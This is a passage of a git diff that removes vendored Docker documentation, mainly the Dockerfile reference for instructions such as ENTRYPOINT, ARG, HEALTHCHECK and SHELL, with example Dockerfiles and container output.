-> will need to use `RUN wget`, `RUN curl` or use another tool from
-> within the container as the `ADD` instruction does not support
-> authentication.
-
-> **Note**:
-> The first encountered `ADD` instruction will invalidate the cache for all
-> following instructions from the Dockerfile if the contents of `<src>` have
-> changed. This includes invalidating the cache for `RUN` instructions.
-> See the [`Dockerfile` Best Practices
-guide](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache) for more information.
-
-
-`ADD` obeys the following rules:
-
-- The `<src>` path must be inside the *context* of the build;
-  you cannot `ADD ../something /something`, because the first step of a
-  `docker build` is to send the context directory (and subdirectories) to the
-  docker daemon.
-
-- If `<src>` is a URL and `<dest>` does not end with a trailing slash, then a
-  file is downloaded from the URL and copied to `<dest>`.
-
-- If `<src>` is a URL and `<dest>` does end with a trailing slash, then the
-  filename is inferred from the URL and the file is downloaded to
-  `<dest>/<filename>`. For instance, `ADD http://example.com/foobar /` would
-  create the file `/foobar`. The URL must have a nontrivial path so that an
-  appropriate filename can be discovered in this case (`http://example.com`
-  will not work).
-
-- If `<src>` is a directory, the entire contents of the directory are copied,
-  including filesystem metadata.
-
-> **Note**:
-> The directory itself is not copied, just its contents.
-
-- If `<src>` is a *local* tar archive in a recognized compression format
-  (identity, gzip, bzip2 or xz) then it is unpacked as a directory. Resources
-  from *remote* URLs are **not** decompressed. When a directory is copied or
-  unpacked, it has the same behavior as `tar -x`, the result is the union of:
-
-    1. Whatever existed at the destination path and
-    2. The contents of the source tree, with conflicts resolved in favor
-       of "2." on a file-by-file basis.
-
-  > **Note**:
-  > Whether a file is identified as a recognized compression format or not
-  > is done solely based on the contents of the file, not the name of the file.
-  > For example, if an empty file happens to end with `.tar.gz` this will not
-  > be recognized as a compressed file and **will not** generate any kind of
-  > decompression error message, rather the file will simply be copied to the
-  > destination.
-
-- If `<src>` is any other kind of file, it is copied individually along with
-  its metadata. In this case, if `<dest>` ends with a trailing slash `/`, it
-  will be considered a directory and the contents of `<src>` will be written
-  at `<dest>/base(<src>)`.
-
-- If multiple `<src>` resources are specified, either directly or due to the
-  use of a wildcard, then `<dest>` must be a directory, and it must end with
-  a slash `/`.
-
-- If `<dest>` does not end with a trailing slash, it will be considered a
-  regular file and the contents of `<src>` will be written at `<dest>`.
-
-- If `<dest>` doesn't exist, it is created along with all missing directories
-  in its path.
-
-## COPY
-
-COPY has two forms:
-
-- `COPY <src>... <dest>`
-- `COPY ["<src>",... "<dest>"]` (this form is required for paths containing
-whitespace)
-
-The `COPY` instruction copies new files or directories from `<src>`
-and adds them to the filesystem of the container at the path `<dest>`.
-
-Multiple `<src>` resource may be specified but they must be relative
-to the source directory that is being built (the context of the build).
-
-Each `<src>` may contain wildcards and matching will be done using Go's
-[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. For example:
-
-    COPY hom* /mydir/        # adds all files starting with "hom"
-    COPY hom?.txt /mydir/    # ? is replaced with any single character, e.g., "home.txt"
-
-The `<dest>` is an absolute path, or a path relative to `WORKDIR`, into which
-the source will be copied inside the destination container.
-
-    COPY test relativeDir/   # adds "test" to `WORKDIR`/relativeDir/
-    COPY test /absoluteDir/  # adds "test" to /absoluteDir/
-
-All new files and directories are created with a UID and GID of 0.
-
-> **Note**:
-> If you build using STDIN (`docker build - < somefile`), there is no
-> build context, so `COPY` can't be used.
-
-`COPY` obeys the following rules:
-
-- The `<src>` path must be inside the *context* of the build;
-  you cannot `COPY ../something /something`, because the first step of a
-  `docker build` is to send the context directory (and subdirectories) to the
-  docker daemon.
-
-- If `<src>` is a directory, the entire contents of the directory are copied,
-  including filesystem metadata.
-
-> **Note**:
-> The directory itself is not copied, just its contents.
-
-- If `<src>` is any other kind of file, it is copied individually along with
-  its metadata. In this case, if `<dest>` ends with a trailing slash `/`, it
-  will be considered a directory and the contents of `<src>` will be written
-  at `<dest>/base(<src>)`.
-
-- If multiple `<src>` resources are specified, either directly or due to the
-  use of a wildcard, then `<dest>` must be a directory, and it must end with
-  a slash `/`.
-
-- If `<dest>` does not end with a trailing slash, it will be considered a
-  regular file and the contents of `<src>` will be written at `<dest>`.
-
-- If `<dest>` doesn't exist, it is created along with all missing directories
-  in its path.
-
-## ENTRYPOINT
-
-ENTRYPOINT has two forms:
-
-- `ENTRYPOINT ["executable", "param1", "param2"]`
-  (*exec* form, preferred)
-- `ENTRYPOINT command param1 param2`
-  (*shell* form)
-
-An `ENTRYPOINT` allows you to configure a container that will run as an executable.
-
-For example, the following will start nginx with its default content, listening
-on port 80:
-
-    docker run -i -t --rm -p 80:80 nginx
-
-Command line arguments to `docker run <image>` will be appended after all
-elements in an *exec* form `ENTRYPOINT`, and will override all elements specified
-using `CMD`.
-This allows arguments to be passed to the entry point, i.e., `docker run <image> -d`
-will pass the `-d` argument to the entry point.
-You can override the `ENTRYPOINT` instruction using the `docker run --entrypoint`
-flag.
-
-The *shell* form prevents any `CMD` or `run` command line arguments from being
-used, but has the disadvantage that your `ENTRYPOINT` will be started as a
-subcommand of `/bin/sh -c`, which does not pass signals.
-This means that the executable will not be the container's `PID 1` - and
-will _not_ receive Unix signals - so your executable will not receive a
-`SIGTERM` from `docker stop <container>`.
-
-Only the last `ENTRYPOINT` instruction in the `Dockerfile` will have an effect.
-
-### Exec form ENTRYPOINT example
-
-You can use the *exec* form of `ENTRYPOINT` to set fairly stable default commands
-and arguments and then use either form of `CMD` to set additional defaults that
-are more likely to be changed.
-
-    FROM ubuntu
-    ENTRYPOINT ["top", "-b"]
-    CMD ["-c"]
-
-When you run the container, you can see that `top` is the only process:
-
-    $ docker run -it --rm --name test  top -H
-    top - 08:25:00 up  7:27,  0 users,  load average: 0.00, 0.01, 0.05
-    Threads:   1 total,   1 running,   0 sleeping,   0 stopped,   0 zombie
-    %Cpu(s):  0.1 us,  0.1 sy,  0.0 ni, 99.7 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
-    KiB Mem:   2056668 total,  1616832 used,   439836 free,    99352 buffers
-    KiB Swap:  1441840 total,        0 used,  1441840 free.  1324440 cached Mem
-
-      PID USER      PR  NI    VIRT    RES    SHR S %CPU %MEM     TIME+ COMMAND
-        1 root      20   0   19744   2336   2080 R  0.0  0.1   0:00.04 top
-
-To examine the result further, you can use `docker exec`:
-
-    $ docker exec -it test ps aux
-    USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
-    root         1  2.6  0.1  19752  2352 ?        Ss+  08:24   0:00 top -b -H
-    root         7  0.0  0.1  15572  2164 ?        R+   08:25   0:00 ps aux
-
-And you can gracefully request `top` to shut down using `docker stop test`.
-
-The following `Dockerfile` shows using the `ENTRYPOINT` to run Apache in the
-foreground (i.e., as `PID 1`):
-
-```
-FROM debian:stable
-RUN apt-get update && apt-get install -y --force-yes apache2
-EXPOSE 80 443
-VOLUME ["/var/www", "/var/log/apache2", "/etc/apache2"]
-ENTRYPOINT ["/usr/sbin/apache2ctl", "-D", "FOREGROUND"]
-```
-
-If you need to write a starter script for a single executable, you can ensure that
-the final executable receives the Unix signals by using `exec` and `gosu`
-commands:
-
-```bash
-#!/bin/bash
-set -e
-
-if [ "$1" = 'postgres' ]; then
-    chown -R postgres "$PGDATA"
-
-    if [ -z "$(ls -A "$PGDATA")" ]; then
-        gosu postgres initdb
-    fi
-
-    exec gosu postgres "$@"
-fi
-
-exec "$@"
-```
-
-Lastly, if you need to do some extra cleanup (or communicate with other containers)
-on shutdown, or are co-ordinating more than one executable, you may need to ensure
-that the `ENTRYPOINT` script receives the Unix signals, passes them on, and then
-does some more work:
-
-```
-#!/bin/sh
-# Note: I've written this using sh so it works in the busybox container too
-
-# USE the trap if you need to also do manual cleanup after the service is stopped,
-#     or need to start multiple services in the one container
-trap "echo TRAPed signal" HUP INT QUIT TERM
-
-# start service in background here
-/usr/sbin/apachectl start
-
-echo "[hit enter key to exit] or run 'docker stop <container>'"
-read
-
-# stop service and clean up here
-echo "stopping apache"
-/usr/sbin/apachectl stop
-
-echo "exited $0"
-```
-
-If you run this image with `docker run -it --rm -p 80:80 --name test apache`,
-you can then examine the container's processes with `docker exec`, or `docker top`,
-and then ask the script to stop Apache:
-
-```bash
-$ docker exec -it test ps aux
-USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
-root         1  0.1  0.0   4448   692 ?        Ss+  00:42   0:00 /bin/sh /run.sh 123 cmd cmd2
-root        19  0.0  0.2  71304  4440 ?        Ss   00:42   0:00 /usr/sbin/apache2 -k start
-www-data    20  0.2  0.2 360468  6004 ?        Sl   00:42   0:00 /usr/sbin/apache2 -k start
-www-data    21  0.2  0.2 360468  6000 ?        Sl   00:42   0:00 /usr/sbin/apache2 -k start
-root        81  0.0  0.1  15572  2140 ?        R+   00:44   0:00 ps aux
-$ docker top test
-PID                 USER                COMMAND
-10035               root                {run.sh} /bin/sh /run.sh 123 cmd cmd2
-10054               root                /usr/sbin/apache2 -k start
-10055               33                  /usr/sbin/apache2 -k start
-10056               33                  /usr/sbin/apache2 -k start
-$ /usr/bin/time docker stop test
-test
-real	0m 0.27s
-user	0m 0.03s
-sys	0m 0.03s
-```
-
-> **Note:** you can override the `ENTRYPOINT` setting using `--entrypoint`,
-> but this can only set the binary to *exec* (no `sh -c` will be used).
-
-> **Note**:
-> The *exec* form is parsed as a JSON array, which means that
-> you must use double-quotes (") around words not single-quotes (').
-
-> **Note**:
-> Unlike the *shell* form, the *exec* form does not invoke a command shell.
-> This means that normal shell processing does not happen. For example,
-> `ENTRYPOINT [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`.
-> If you want shell processing then either use the *shell* form or execute
-> a shell directly, for example: `ENTRYPOINT [ "sh", "-c", "echo $HOME" ]`.
-> When using the exec form and executing a shell directly, as in the case for
-> the shell form, it is the shell that is doing the environment variable
-> expansion, not docker.
-
-### Shell form ENTRYPOINT example
-
-You can specify a plain string for the `ENTRYPOINT` and it will execute in `/bin/sh -c`.
-This form will use shell processing to substitute shell environment variables,
-and will ignore any `CMD` or `docker run` command line arguments.
-To ensure that `docker stop` will signal any long running `ENTRYPOINT` executable
-correctly, you need to remember to start it with `exec`:
-
-    FROM ubuntu
-    ENTRYPOINT exec top -b
-
-When you run this image, you'll see the single `PID 1` process:
-
-    $ docker run -it --rm --name test top
-    Mem: 1704520K used, 352148K free, 0K shrd, 0K buff, 140368121167873K cached
-    CPU:   5% usr   0% sys   0% nic  94% idle   0% io   0% irq   0% sirq
-    Load average: 0.08 0.03 0.05 2/98 6
-      PID  PPID USER     STAT   VSZ %VSZ %CPU COMMAND
-        1     0 root     R     3164   0%   0% top -b
-
-Which will exit cleanly on `docker stop`:
-
-    $ /usr/bin/time docker stop test
-    test
-    real	0m 0.20s
-    user	0m 0.02s
-    sys	0m 0.04s
-
-If you forget to add `exec` to the beginning of your `ENTRYPOINT`:
-
-    FROM ubuntu
-    ENTRYPOINT top -b
-    CMD --ignored-param1
-
-You can then run it (giving it a name for the next step):
-
-    $ docker run -it --name test top --ignored-param2
-    Mem: 1704184K used, 352484K free, 0K shrd, 0K buff, 140621524238337K cached
-    CPU:   9% usr   2% sys   0% nic  88% idle   0% io   0% irq   0% sirq
-    Load average: 0.01 0.02 0.05 2/101 7
-      PID  PPID USER     STAT   VSZ %VSZ %CPU COMMAND
-        1     0 root     S     3168   0%   0% /bin/sh -c top -b cmd cmd2
-        7     1 root     R     3164   0%   0% top -b
-
-You can see from the output of `top` that the specified `ENTRYPOINT` is not `PID 1`.
-
-If you then run `docker stop test`, the container will not exit cleanly - the
-`stop` command will be forced to send a `SIGKILL` after the timeout:
-
-    $ docker exec -it test ps aux
-    PID   USER     COMMAND
-        1 root     /bin/sh -c top -b cmd cmd2
-        7 root     top -b
-        8 root     ps aux
-    $ /usr/bin/time docker stop test
-    test
-    real	0m 10.19s
-    user	0m 0.04s
-    sys	0m 0.03s
-
-### Understand how CMD and ENTRYPOINT interact
-
-Both `CMD` and `ENTRYPOINT` instructions define what command gets executed when running a container.
-There are few rules that describe their co-operation.
-
-1. Dockerfile should specify at least one of `CMD` or `ENTRYPOINT` commands.
-
-2. `ENTRYPOINT` should be defined when using the container as an executable.
-
-3. `CMD` should be used as a way of defining default arguments for an `ENTRYPOINT` command
-or for executing an ad-hoc command in a container.
-
-4. `CMD` will be overridden when running the container with alternative arguments.
-
-The table below shows what command is executed for different `ENTRYPOINT` / `CMD` combinations:
-
-|                                | No ENTRYPOINT              | ENTRYPOINT exec_entry p1_entry | ENTRYPOINT ["exec_entry", "p1_entry"]          |
-|--------------------------------|----------------------------|--------------------------------|------------------------------------------------|
-| **No CMD**                     | *error, not allowed*       | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry                            |
-| **CMD ["exec_cmd", "p1_cmd"]** | exec_cmd p1_cmd            | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry exec_cmd p1_cmd            |
-| **CMD ["p1_cmd", "p2_cmd"]**   | p1_cmd p2_cmd              | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry p1_cmd p2_cmd              |
-| **CMD exec_cmd p1_cmd**        | /bin/sh -c exec_cmd p1_cmd | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry /bin/sh -c exec_cmd p1_cmd |
-
-## VOLUME
-
-    VOLUME ["/data"]
-
-The `VOLUME` instruction creates a mount point with the specified name
-and marks it as holding externally mounted volumes from native host or other
-containers. The value can be a JSON array, `VOLUME ["/var/log/"]`, or a plain
-string with multiple arguments, such as `VOLUME /var/log` or `VOLUME /var/log
-/var/db`. For more information/examples and mounting instructions via the
-Docker client, refer to
-[*Share Directories via Volumes*](https://docs.docker.com/engine/tutorials/dockervolumes/#/mount-a-host-directory-as-a-data-volume)
-documentation.
-
-The `docker run` command initializes the newly created volume with any data
-that exists at the specified location within the base image. For example,
-consider the following Dockerfile snippet:
-
-    FROM ubuntu
-    RUN mkdir /myvol
-    RUN echo "hello world" > /myvol/greeting
-    VOLUME /myvol
-
-This Dockerfile results in an image that causes `docker run`, to
-create a new mount point at `/myvol` and copy the  `greeting` file
-into the newly created volume.
-
-> **Note**:
-> If any build steps change the data within the volume after it has been
-> declared, those changes will be discarded.
-
-> **Note**:
-> The list is parsed as a JSON array, which means that
-> you must use double-quotes (") around words not single-quotes (').
-
-## USER
-
-    USER daemon
-
-The `USER` instruction sets the user name or UID to use when running the image
-and for any `RUN`, `CMD` and `ENTRYPOINT` instructions that follow it in the
-`Dockerfile`.
-
-## WORKDIR
-
-    WORKDIR /path/to/workdir
-
-The `WORKDIR` instruction sets the working directory for any `RUN`, `CMD`,
-`ENTRYPOINT`, `COPY` and `ADD` instructions that follow it in the `Dockerfile`.
-If the `WORKDIR` doesn't exist, it will be created even if it's not used in any
-subsequent `Dockerfile` instruction.
-
-It can be used multiple times in the one `Dockerfile`. If a relative path
-is provided, it will be relative to the path of the previous `WORKDIR`
-instruction. For example:
-
-    WORKDIR /a
-    WORKDIR b
-    WORKDIR c
-    RUN pwd
-
-The output of the final `pwd` command in this `Dockerfile` would be
-`/a/b/c`.
-
-The `WORKDIR` instruction can resolve environment variables previously set using
-`ENV`. You can only use environment variables explicitly set in the `Dockerfile`.
-For example:
-
-    ENV DIRPATH /path
-    WORKDIR $DIRPATH/$DIRNAME
-    RUN pwd
-
-The output of the final `pwd` command in this `Dockerfile` would be
-`/path/$DIRNAME`
-
-## ARG
-
-    ARG <name>[=<default value>]
-
-The `ARG` instruction defines a variable that users can pass at build-time to
-the builder with the `docker build` command using the `--build-arg <varname>=<value>`
-flag. If a user specifies a build argument that was not
-defined in the Dockerfile, the build outputs a warning.
-
-```
-[Warning] One or more build-args [foo] were not consumed.
-```
-
-The Dockerfile author can define a single variable by specifying `ARG` once or many
-variables by specifying `ARG` more than once. For example, a valid Dockerfile:
-
-```
-FROM busybox
-ARG user1
-ARG buildno
-...
-```
-
-A Dockerfile author may optionally specify a default value for an `ARG` instruction:
-
-```
-FROM busybox
-ARG user1=someuser
-ARG buildno=1
-...
-```
-
-If an `ARG` value has a default and if there is no value passed at build-time, the
-builder uses the default.
-
-An `ARG` variable definition comes into effect from the line on which it is
-defined in the `Dockerfile` not from the argument's use on the command-line or
-elsewhere.  For example, consider this Dockerfile:
-
-```
-1 FROM busybox
-2 USER ${user:-some_user}
-3 ARG user
-4 USER $user
-...
-```
-A user builds this file by calling:
-
-```
-$ docker build --build-arg user=what_user Dockerfile
-```
-
-The `USER` at line 2 evaluates to `some_user` as the `user` variable is defined on the
-subsequent line 3. The `USER` at line 4 evaluates to `what_user` as `user` is
-defined and the `what_user` value was passed on the command line. Prior to its definition by an
-`ARG` instruction, any use of a variable results in an empty string.
-
-> **Warning:** It is not recommended to use build-time variables for
->  passing secrets like github keys, user credentials etc. Build-time variable
->  values are visible to any user of the image with the `docker history` command.
-
-You can use an `ARG` or an `ENV` instruction to specify variables that are
-available to the `RUN` instruction. Environment variables defined using the
-`ENV` instruction always override an `ARG` instruction of the same name. Consider
-this Dockerfile with an `ENV` and `ARG` instruction.
-
-```
-1 FROM ubuntu
-2 ARG CONT_IMG_VER
-3 ENV CONT_IMG_VER v1.0.0
-4 RUN echo $CONT_IMG_VER
-```
-Then, assume this image is built with this command:
-
-```
-$ docker build --build-arg CONT_IMG_VER=v2.0.1 Dockerfile
-```
-
-In this case, the `RUN` instruction uses `v1.0.0` instead of the `ARG` setting
-passed by the user:`v2.0.1` This behavior is similar to a shell
-script where a locally scoped variable overrides the variables passed as
-arguments or inherited from environment, from its point of definition.
-
-Using the example above but a different `ENV` specification you can create more
-useful interactions between `ARG` and `ENV` instructions:
-
-```
-1 FROM ubuntu
-2 ARG CONT_IMG_VER
-3 ENV CONT_IMG_VER ${CONT_IMG_VER:-v1.0.0}
-4 RUN echo $CONT_IMG_VER
-```
-
-Unlike an `ARG` instruction, `ENV` values are always persisted in the built
-image. Consider a docker build without the `--build-arg` flag:
-
-```
-$ docker build Dockerfile
-```
-
-Using this Dockerfile example, `CONT_IMG_VER` is still persisted in the image but
-its value would be `v1.0.0` as it is the default set in line 3 by the `ENV` instruction.
-
-The variable expansion technique in this example allows you to pass arguments
-from the command line and persist them in the final image by leveraging the
-`ENV` instruction. Variable expansion is only supported for [a limited set of
-Dockerfile instructions.](#environment-replacement)
-
-Docker has a set of predefined `ARG` variables that you can use without a
-corresponding `ARG` instruction in the Dockerfile.
-
-* `HTTP_PROXY`
-* `http_proxy`
-* `HTTPS_PROXY`
-* `https_proxy`
-* `FTP_PROXY`
-* `ftp_proxy`
-* `NO_PROXY`
-* `no_proxy`
-
-To use these, simply pass them on the command line using the flag:
-
-```
---build-arg <varname>=<value>
-```
-
-### Impact on build caching
-
-`ARG` variables are not persisted into the built image as `ENV` variables are.
-However, `ARG` variables do impact the build cache in similar ways. If a
-Dockerfile defines an `ARG` variable whose value is different from a previous
-build, then a "cache miss" occurs upon its first usage, not its definition. In
-particular, all `RUN` instructions following an `ARG` instruction use the `ARG`
-variable implicitly (as an environment variable), thus can cause a cache miss.
-
-For example, consider these two Dockerfile:
-
-```
-1 FROM ubuntu
-2 ARG CONT_IMG_VER
-3 RUN echo $CONT_IMG_VER
-```
-
-```
-1 FROM ubuntu
-2 ARG CONT_IMG_VER
-3 RUN echo hello
-```
-
-If you specify `--build-arg CONT_IMG_VER=<value>` on the command line, in both
-cases, the specification on line 2 does not cause a cache miss; line 3 does
-cause a cache miss.`ARG CONT_IMG_VER` causes the RUN line to be identified
-as the same as running `CONT_IMG_VER=<value>` echo hello, so if the `<value>`
-changes, we get a cache miss.
-
-Consider another example under the same command line:
-
-```
-1 FROM ubuntu
-2 ARG CONT_IMG_VER
-3 ENV CONT_IMG_VER $CONT_IMG_VER
-4 RUN echo $CONT_IMG_VER
-```
-In this example, the cache miss occurs on line 3. The miss happens because
-the variable's value in the `ENV` references the `ARG` variable and that
-variable is changed through the command line. In this example, the `ENV`
-command causes the image to include the value.
-
-If an `ENV` instruction overrides an `ARG` instruction of the same name, like
-this Dockerfile:
-
-```
-1 FROM ubuntu
-2 ARG CONT_IMG_VER
-3 ENV CONT_IMG_VER hello
-4 RUN echo $CONT_IMG_VER
-```
-
-Line 3 does not cause a cache miss because the value of `CONT_IMG_VER` is a
-constant (`hello`). As a result, the environment variables and values used on
-the `RUN` (line 4) doesn't change between builds.
-
-## ONBUILD
-
-    ONBUILD [INSTRUCTION]
-
-The `ONBUILD` instruction adds to the image a *trigger* instruction to
-be executed at a later time, when the image is used as the base for
-another build. The trigger will be executed in the context of the
-downstream build, as if it had been inserted immediately after the
-`FROM` instruction in the downstream `Dockerfile`.
-
-Any build instruction can be registered as a trigger.
-
-This is useful if you are building an image which will be used as a base
-to build other images, for example an application build environment or a
-daemon which may be customized with user-specific configuration.
-
-For example, if your image is a reusable Python application builder, it
-will require application source code to be added in a particular
-directory, and it might require a build script to be called *after*
-that. You can't just call `ADD` and `RUN` now, because you don't yet
-have access to the application source code, and it will be different for
-each application build. You could simply provide application developers
-with a boilerplate `Dockerfile` to copy-paste into their application, but
-that is inefficient, error-prone and difficult to update because it
-mixes with application-specific code.
-
-The solution is to use `ONBUILD` to register advance instructions to
-run later, during the next build stage.
-
-Here's how it works:
-
-1. When it encounters an `ONBUILD` instruction, the builder adds a
-   trigger to the metadata of the image being built. The instruction
-   does not otherwise affect the current build.
-2. At the end of the build, a list of all triggers is stored in the
-   image manifest, under the key `OnBuild`. They can be inspected with
-   the `docker inspect` command.
-3. Later the image may be used as a base for a new build, using the
-   `FROM` instruction. As part of processing the `FROM` instruction,
-   the downstream builder looks for `ONBUILD` triggers, and executes
-   them in the same order they were registered. If any of the triggers
-   fail, the `FROM` instruction is aborted which in turn causes the
-   build to fail. If all triggers succeed, the `FROM` instruction
-   completes and the build continues as usual.
-4. Triggers are cleared from the final image after being executed. In
-   other words they are not inherited by "grand-children" builds.
-
-For example you might add something like this:
-
-    [...]
-    ONBUILD ADD . /app/src
-    ONBUILD RUN /usr/local/bin/python-build --dir /app/src
-    [...]
-
-> **Warning**: Chaining `ONBUILD` instructions using `ONBUILD ONBUILD` isn't allowed.
-
-> **Warning**: The `ONBUILD` instruction may not trigger `FROM` or `MAINTAINER` instructions.
-
-## STOPSIGNAL
-
-    STOPSIGNAL signal
-
-The `STOPSIGNAL` instruction sets the system call signal that will be sent to the container to exit.
-This signal can be a valid unsigned number that matches a position in the kernel's syscall table, for instance 9,
-or a signal name in the format SIGNAME, for instance SIGKILL.
-
-## HEALTHCHECK
-
-The `HEALTHCHECK` instruction has two forms:
-
-* `HEALTHCHECK [OPTIONS] CMD command` (check container health by running a command inside the container)
-* `HEALTHCHECK NONE` (disable any healthcheck inherited from the base image)
-
-The `HEALTHCHECK` instruction tells Docker how to test a container to check that
-it is still working. This can detect cases such as a web server that is stuck in
-an infinite loop and unable to handle new connections, even though the server
-process is still running.
-
-When a container has a healthcheck specified, it has a _health status_ in
-addition to its normal status. This status is initially `starting`. Whenever a
-health check passes, it becomes `healthy` (whatever state it was previously in).
-After a certain number of consecutive failures, it becomes `unhealthy`.
-
-The options that can appear before `CMD` are:
-
-* `--interval=DURATION` (default: `30s`)
-* `--timeout=DURATION` (default: `30s`)
-* `--retries=N` (default: `3`)
-
-The health check will first run **interval** seconds after the container is
-started, and then again **interval** seconds after each previous check completes.
-
-If a single run of the check takes longer than **timeout** seconds then the check
-is considered to have failed.
-
-It takes **retries** consecutive failures of the health check for the container
-to be considered `unhealthy`.
-
-There can only be one `HEALTHCHECK` instruction in a Dockerfile. If you list
-more than one then only the last `HEALTHCHECK` will take effect.
-
-The command after the `CMD` keyword can be either a shell command (e.g. `HEALTHCHECK
-CMD /bin/check-running`) or an _exec_ array (as with other Dockerfile commands;
-see e.g. `ENTRYPOINT` for details).
-
-The command's exit status indicates the health status of the container.
-The possible values are:
-
-- 0: success - the container is healthy and ready for use
-- 1: unhealthy - the container is not working correctly
-- 2: reserved - do not use this exit code
-
-For example, to check every five minutes or so that a web-server is able to
-serve the site's main page within three seconds:
-
-    HEALTHCHECK --interval=5m --timeout=3s \
-      CMD curl -f http://localhost/ || exit 1
-
-To help debug failing probes, any output text (UTF-8 encoded) that the command writes
-on stdout or stderr will be stored in the health status and can be queried with
-`docker inspect`. Such output should be kept short (only the first 4096 bytes
-are stored currently).
-
-When the health status of a container changes, a `health_status` event is
-generated with the new status.
-
-The `HEALTHCHECK` feature was added in Docker 1.12.
-
-
-## SHELL
-
-    SHELL ["executable", "parameters"]
-
-The `SHELL` instruction allows the default shell used for the *shell* form of
-commands to be overridden. The default shell on Linux is `["/bin/sh", "-c"]`, and on
-Windows is `["cmd", "/S", "/C"]`. The `SHELL` instruction *must* be written in JSON
-form in a Dockerfile.
-
-The `SHELL` instruction is particularly useful on Windows where there are
-two commonly used and quite different native shells: `cmd` and `powershell`, as
-well as alternate shells available including `sh`.
-
-The `SHELL` instruction can appear multiple times. Each `SHELL` instruction overrides
-all previous `SHELL` instructions, and affects all subsequent instructions. For example:
-
-    FROM microsoft/windowsservercore
-
-    # Executed as cmd /S /C echo default
-    RUN echo default
-
-    # Executed as cmd /S /C powershell -command Write-Host default
-    RUN powershell -command Write-Host default
-
-    # Executed as powershell -command Write-Host hello
-    SHELL ["powershell", "-command"]
-    RUN Write-Host hello
-
-    # Executed as cmd /S /C echo hello
-    SHELL ["cmd", "/S"", "/C"]
-    RUN echo hello
-
-The following instructions can be affected by the `SHELL` instruction when the
-*shell* form of them is used in a Dockerfile: `RUN`, `CMD` and `ENTRYPOINT`.
-
-The following example is a common pattern found on Windows which can be
-streamlined by using the `SHELL` instruction:
-
-    ...
-    RUN powershell -command Execute-MyCmdlet -param1 "c:\foo.txt"
-    ...
-
-The command invoked by docker will be:
-
-    cmd /S /C powershell -command Execute-MyCmdlet -param1 "c:\foo.txt"
-
-This is inefficient for two reasons. First, there is an un-necessary cmd.exe command
-processor (aka shell) being invoked. Second, each `RUN` instruction in the *shell*
-form requires an extra `powershell -command` prefixing the command.
-
-To make this more efficient, one of two mechanisms can be employed. One is to
-use the JSON form of the RUN command such as:
-
-    ...
-    RUN ["powershell", "-command", "Execute-MyCmdlet", "-param1 \"c:\\foo.txt\""]
-    ...
-
-While the JSON form is unambiguous and does not use the un-necessary cmd.exe,
-it does require more verbosity through double-quoting and escaping. The alternate
-mechanism is to use the `SHELL` instruction and the *shell* form,
-making a more natural syntax for Windows users, especially when combined with
-the `escape` parser directive:
-
-    # escape=`
-
-    FROM microsoft/nanoserver
-    SHELL ["powershell","-command"]
-    RUN New-Item -ItemType Directory C:\Example
-    ADD Execute-MyCmdlet.ps1 c:\example\
-    RUN c:\example\Execute-MyCmdlet -sample 'hello world'
-
-Resulting in:
-
-    PS E:\docker\build\shell> docker build -t shell .
-    Sending build context to Docker daemon 4.096 kB
-    Step 1/5 : FROM microsoft/nanoserver
-     ---> 22738ff49c6d
-    Step 2/5 : SHELL powershell -command
-     ---> Running in 6fcdb6855ae2
-     ---> 6331462d4300
-    Removing intermediate container 6fcdb6855ae2
-    Step 3/5 : RUN New-Item -ItemType Directory C:\Example
-     ---> Running in d0eef8386e97
-    
-    
-        Directory: C:\
-    
-    
-    Mode                LastWriteTime         Length Name
-    ----                -------------         ------ ----
-    d-----       10/28/2016  11:26 AM                Example
-    
-    
-     ---> 3f2fbf1395d9
-    Removing intermediate container d0eef8386e97
-    Step 4/5 : ADD Execute-MyCmdlet.ps1 c:\example\
-     ---> a955b2621c31
-    Removing intermediate container b825593d39fc
-    Step 5/5 : RUN c:\example\Execute-MyCmdlet 'hello world'
-     ---> Running in be6d8e63fe75
-    hello world
-     ---> 8e559e9bf424
-    Removing intermediate container be6d8e63fe75
-    Successfully built 8e559e9bf424
-    PS E:\docker\build\shell>
-
-The `SHELL` instruction could also be used to modify the way in which
-a shell operates. For example, using `SHELL cmd /S /C /V:ON|OFF` on Windows, delayed
-environment variable expansion semantics could be modified.
-
-The `SHELL` instruction can also be used on Linux should an alternate shell be
-required such as `zsh`, `csh`, `tcsh` and others.
-
-The `SHELL` feature was added in Docker 1.12.
-
-## Dockerfile examples
-
-Below you can see some examples of Dockerfile syntax. If you're interested in
-something more realistic, take a look at the list of [Dockerization examples](https://docs.docker.com/engine/examples/).
-
-```
-# Nginx
-#
-# VERSION               0.0.1
-
-FROM      ubuntu
-LABEL Description="This image is used to start the foobar executable" Vendor="ACME Products" Version="1.0"
-RUN apt-get update && apt-get install -y inotify-tools nginx apache2 openssh-server
-```
-
-```
-# Firefox over VNC
-#
-# VERSION               0.3
-
-FROM ubuntu
-
-# Install vnc, xvfb in order to create a 'fake' display and firefox
-RUN apt-get update && apt-get install -y x11vnc xvfb firefox
-RUN mkdir ~/.vnc
-# Setup a password
-RUN x11vnc -storepasswd 1234 ~/.vnc/passwd
-# Autostart firefox (might not be the best way, but it does the trick)
-RUN bash -c 'echo "firefox" >> /.bashrc'
-
-EXPOSE 5900
-CMD    ["x11vnc", "-forever", "-usepw", "-create"]
-```
-
-```
-# Multiple images example
-#
-# VERSION               0.1
-
-FROM ubuntu
-RUN echo foo > bar
-# Will output something like ===> 907ad6c2736f
-
-FROM ubuntu
-RUN echo moo > oink
-# Will output something like ===> 695d7793cbe4
-
-# You᾿ll now have two images, 907ad6c2736f with /bar, and 695d7793cbe4 with
-# /oink.
-```
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/attach.md b/vendor/github.com/docker/docker/docs/reference/commandline/attach.md
deleted file mode 100644
index 307068a339..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/attach.md
+++ /dev/null
@@ -1,131 +0,0 @@
----
-title: "attach"
-description: "The attach command description and usage"
-keywords: "attach, running, container"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
